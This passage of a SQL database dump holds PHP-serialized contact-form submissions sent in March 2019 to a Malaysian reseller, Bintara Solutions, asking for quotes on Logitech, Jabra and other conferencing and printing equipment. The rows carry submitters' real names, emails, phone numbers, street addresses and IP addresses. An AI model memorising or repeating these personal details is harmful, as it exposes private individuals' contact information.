Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"Husna\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"aznauna89@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0174123549\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:33:\"Mutiara Cita Technologies Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:49:\"RS1619xst synology - please quote the item below.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"30\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-08 15:25:47','183.171.185.22','1'),(96,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"JOHN LIM\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:34:\"jzechoon.lim@motorolasolutions.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0182198345\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"MOTOROLA SOLUTIONS\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:61:\"Please quo us 1 unit of Zebra 110Xi4 600 dpi/23.5 dots per mm\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"45\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-08 15:52:17','140.101.159.251','1'),(97,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Adrian Yong\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"adrian.yong@my.zalora.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0162106563\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:31:\"Jade EServices Malaysia Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:99:\"Southgate Commercial Centre, Unit A-5-1, Level 5, Block A, No. 2, Jalan Dua, Off Jalan Chan Sow Lin\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Logitech MeetUp\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:142:\"Hi, I am looking to purchase a Logitech Meetup with extended mic to turn my meeting room into a Zoom Room. Can I get a quote from you, please?\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"42\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-08 16:13:09','192.228.226.196','1'),(98,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"SALINA REHMAN\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"salina@realtec.com.sg\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"07-5098181\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"REALTEC ENGINEERING SDN BHD\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:75:\"Would you kindly quote for Rally equipment &amp; Rally system price for us?\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"07\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-09 09:33:03','60.52.19.70','1'),(99,12,'a:11:{i:0;a:7:{s:2:\"id\";s:3:\"126\";s:4:\"slug\";s:19:\"get-quotation-jabra\";s:4:\"name\";s:21:\"Get Quotation (Jabra)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:3:\"129\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Gregorius Erwin\";}i:2;a:7:{s:2:\"id\";s:3:\"130\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"erwin@transpasific.co.id\";}i:3;a:7:{s:2:\"id\";s:3:\"133\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"+628115229000\";}i:4;a:7:{s:2:\"id\";s:3:\"131\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"PT Trans Psific Energi\";}i:5;a:7:{s:2:\"id\";s:3:\"135\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:117:\"Ruko Manhattan Avenue D-05, Komplek Citraland, Jl. A. Yani KM : 7,8, Banjarmasin 70654, Kalimantan Selatan, Indonesia\";}i:6;a:7:{s:2:\"id\";s:3:\"134\";s:4:\"slug\";s:7:\"product\";s:4:\"name\";s:7:\"Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:642:\"a:19:{i:0;s:16:\"Jabra Evolve 65t\";i:1;s:15:\"Jabra Evolve 80\";i:2;s:16:\"Jabra Evolve 75e\";i:3;s:15:\"Jabra Evolve 75\";i:4;s:29:\"Jabra Evolve 65 Stereo / Mono\";i:5;s:29:\"Jabra Evolve 40 Stereo / Mono\";i:6;s:29:\"Jabra Evolve 30 Stereo / Mono\";i:7;s:29:\"Jabra Evolve 20 Stereo / Mono\";i:8;s:18:\"Jabra Evolve 20 SE\";i:9;s:15:\"Jabra Engage 50\";i:10;s:17:\"Jabra Biz 2400 II\";i:11;s:29:\"Jabra BIZ 2400 II Mono 3-in-1\";i:12;s:21:\"Jabra Biz 2400 II DUO\";i:13;s:14:\"Jabra Biz 2300\";i:14;s:17:\"Jabra BIZ 2300 QD\";i:15;s:21:\"Jabra BIZ 2300 QD DUO\";i:16;s:14:\"Jabra Biz 1500\";i:17;s:22:\"Jabra Biz 1500 DUO USB\";i:18;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"Jabra Evolve 65t\";}i:7;a:7:{s:2:\"id\";s:3:\"132\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:70:\"I want to buy Jabra Evolve 65T, please give a special price, Thank you\";}i:8;a:7:{s:2:\"id\";s:3:\"125\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:3:\"127\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:3:\"125\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:3:\"128\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:3:\"125\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Jabra)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-09 14:07:17','36.75.66.225','1'),(100,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Tomo Ueda\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"t-ueda@jm-s.co.jp\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"81352977310\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"Japan Media Systems\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:258:\"Thank you for hanling my call about our possiblity for future collaboration. As you requested, I tried sending our company profile by e-mail but I got an error. I am sorry, but are the following e-mail address correct?faijbintara@com.my, syafiqbintara@com.my\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-11 17:29:02','210.172.85.202','1'),(101,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"Ammar Ifwat Bin Mukhtar\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"ammarifwat.mukhtar@mct.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0172394569\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"MCT Berhad\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:88:\"Ground Floor MCT Tower, Skypark @ One City, Jalan USJ 25/1, 47650, Subang Jaya, Selangor\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Rally\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:49:\"Do you also sell wireless speaker and microphone?\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"77\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-03-12 10:40:50','202.184.109.228','1'),(102,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"HM GOH\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"hmgoh@bbr.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60355253270\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:36:\"BBR Construction Systems (M) Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:100:\"No.17, jalan Sg Jeluh 32/191, Kawasan Perindustrian Kemuning, Seksyen 32, 40460 Shah Alam, Selangor.\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:246:\"Please provide the warranty informatoin of this device (Logitech Group) as well. And is this product a usb plug and play ready device? Besides PC, networking and this device; do we need any other hardware(s) to complete the tele-conference setup?\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn 